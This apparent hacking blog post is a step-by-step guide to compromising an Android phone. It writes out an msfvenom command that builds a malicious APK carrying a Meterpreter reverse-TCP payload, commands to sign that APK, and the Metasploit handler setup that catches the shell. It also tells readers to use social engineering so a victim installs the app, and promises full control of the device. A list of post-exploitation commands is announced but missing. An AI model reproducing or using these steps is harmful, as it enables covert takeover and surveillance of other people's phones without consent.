When it comes to hacking Android phones, there are tonnes of ways for doing so. There are apps, web portals, scripts, and whatnot. We are going to guide you on how to hack an android phone using Metasploit and MSFVenom.
PS: I have already written one article on hacking android phone with spy note do read it.
So today we are going to learn about MSFVenom and how to hack an Android phone using Metasploit & MSFVenom. MSFVenom is a hacking tool used to hack any Android devices by making malicious apks. MSFVenom is made up of MSFPayload and MSFEncode. MSFEncode is the exploit tool and MSFPayload is the command line interface used to generate and output all types of shell-codes available in Metasploit.
For performing this hack you’ll need Kali Linux OS installed in your computer and Android Phone as a target.
Below are the steps to perform this hack.
Step 1: Creating apk file
Open your KALI LINUX. Open your Terminal and type in the following command
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk
**LHOST= YOUR IP address
**Use ifconfig to find your IP address if you don`t know.
Step 2: Delivering APK file to victim
- You have now created your malicious spyware .apk file. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does actually installs the apk.
**If you get any signing errors or issues use the following:
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname
jarsigner -verify -verbose -certs hackingworld.apk
Step 3: Metasploit setup
. Open up a new terminal and use the following command to start Metasploit framework.
Now in the Metasploit framework console type the following
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.78.129
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
**LHOST= YOUR IP address
Now when the user opens up the app on his/her phone you will get a session with that device. And whoa! The device is yours to operate.
Step 4: Exploit..!!!
Some commands you should definitely try:
So, this was all about hacking an Android Phone using MSFVenom. For feedback, questions or issues, feel free to write them in the comments section.
Also Read- Top hacking Apps for Android Devices